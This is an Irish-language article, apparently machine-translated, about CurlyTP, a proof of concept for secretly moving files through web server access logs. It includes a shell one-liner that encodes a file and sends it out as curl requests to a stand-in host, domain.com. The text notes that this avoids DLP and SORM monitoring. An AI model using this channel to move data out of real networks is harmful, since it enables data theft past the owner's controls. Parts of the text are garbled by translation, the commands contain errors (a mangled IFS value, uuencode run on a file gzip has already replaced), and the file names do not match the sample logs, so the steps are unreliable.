De réir sainmhíniú Vicipéid, is uirlis chomhcheilg é titim marbh a fhreastalaíonn ar fhaisnéis nó roinnt míreanna a mhalartú idir daoine a úsáideann suíomh rúnda. Is é an smaoineamh nach gcomhlíonann daoine riamh - ach malartaíonn siad faisnéis fós chun sábháilteacht oibriúcháin a chothabháil.

Níor cheart aird a tharraingt ar an áit i bhfolach. Mar sin, sa domhan as líne is minic a úsáideann siad rudaí discréideach: bríce scaoilte sa bhalla, leabhar leabharlainne, nó log i gcrann.

Tá go leor uirlisí criptithe agus anaithnidithe ar an Idirlíon, ach tarraingíonn an-aird ar úsáid na n-uirlisí seo. Ina theannta sin, féadfar iad a bhlocáil ar an leibhéal corparáideach nó rialtais. Cad atá le déanamh?

Mhol an forbróir Ryan Flowers rogha suimiúil - úsáid a bhaint as aon fhreastalaí gréasáin mar áit cheilte. Má cheapann tú faoi, cad a dhéanann freastalaí gréasáin? Faigheann sé iarratais, eisíonn sé comhaid agus scríobhann sé logaí. Agus logálann sé gach iarratas, fiú cinn mícheart!

Tharlaíonn sé go gceadaíonn aon fhreastalaí gréasáin leat a shábháil beagnach aon teachtaireacht sa logáil. Bláthanna wondered conas é seo a úsáid.

Tairgeann sé an rogha seo:

1. Tóg comhad téacs (teachtaireacht rúnda) agus ríomh an hash (md5sum).
2. Ionchódaímid é (gzip + uuencode).
3. Scríobhaimid chuig an loga ag baint úsáide as iarratas mícheart d'aon ghnó chuig an bhfreastalaí.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Chun comhad a léamh, ní mór duit na hoibríochtaí seo a dhéanamh in ord droim ar ais: an comhad a dhíchódú agus a dhízipeáil, seiceáil an hash (is féidir an hash a tharchur go sábháilte thar bhealaí oscailte).

Cuirtear spásanna in ionad =+=ionas nach mbeidh spásanna sa seoladh. Úsáideann an clár, a dtugann an t-údar CurlyTP air, úsáid as ionchódú base64, cosúil le ceangaltáin ríomhphoist. Déantar an t-iarratas le eochairfhocal ?transfer?ionas gur féidir leis an bhfaighteoir é a fháil go héasca sna logaí.

Cad a fheicimid sna logs sa chás seo?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Mar a luadh cheana, chun teachtaireacht rúnda a fháil ní mór duit na hoibríochtaí a dhéanamh in ord droim ar ais:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Tá an próiseas éasca a uathoibriú. Meaitseálann md5sum, agus deimhníonn ábhar an chomhaid go raibh gach rud díchódaithe i gceart.

Tá an modh an-simplí. “Is é an pointe atá leis an gcleachtadh seo ná a chruthú gur féidir comhaid a aistriú trí iarratais bheaga neamhchiontacha ghréasáin, agus oibríonn sé ar aon fhreastalaí gréasáin le logaí gnáth-théacs. Go bunúsach, is áit cheilte é gach freastalaí gréasáin!” a scríobhann Flowers.

Ar ndóigh, ní oibríonn an modh ach amháin má tá rochtain ag an bhfaighteoir ar logaí freastalaí. Ach cuireann go leor óstach rochtain den sórt sin ar fáil, mar shampla.

Conas é a úsáid?

Deir Ryan Flowers nach saineolaí slándála faisnéise é agus ní thiomsóidh sé liosta úsáidí féideartha do CurlyTP. Dó, níl ann ach cruthúnas coincheapa gur féidir na huirlisí coitianta a fheicimid gach lá a úsáid ar bhealach neamhghnáthúil.

Go deimhin, tá roinnt buntáistí ag baint leis an modh seo thar “seithí” freastalaí eile Cluiche Digiteach marbh titim nó Bosca Pirate: ní éilíonn sé cumraíocht speisialta ar thaobh an fhreastalaí nó aon phrótacail speisialta - agus ní spreagfaidh sé amhras i measc na ndaoine a dhéanann monatóireacht ar an trácht. Ní dócha go ndéanfaidh córas SORM nó DLP scanadh ar URLanna le haghaidh comhaid téacs comhbhrúite.

Is é seo ceann de na bealaí chun teachtaireachtaí a tharchur trí chomhaid seirbhíse. Is féidir leat cuimhneamh ar conas a d'úsáid roinnt cuideachtaí ardchéime Poist Forbróirí i gCeanntásca HTTP nó i gcód leathanaigh HTML.

Ba é an smaoineamh nach bhfeicfeadh ach forbróirí gréasáin an ubh Cásca seo, mar ní bhreathnódh gnáthdhuine ar na ceanntásca nó ar an gcód HTML.

Foinse: will.com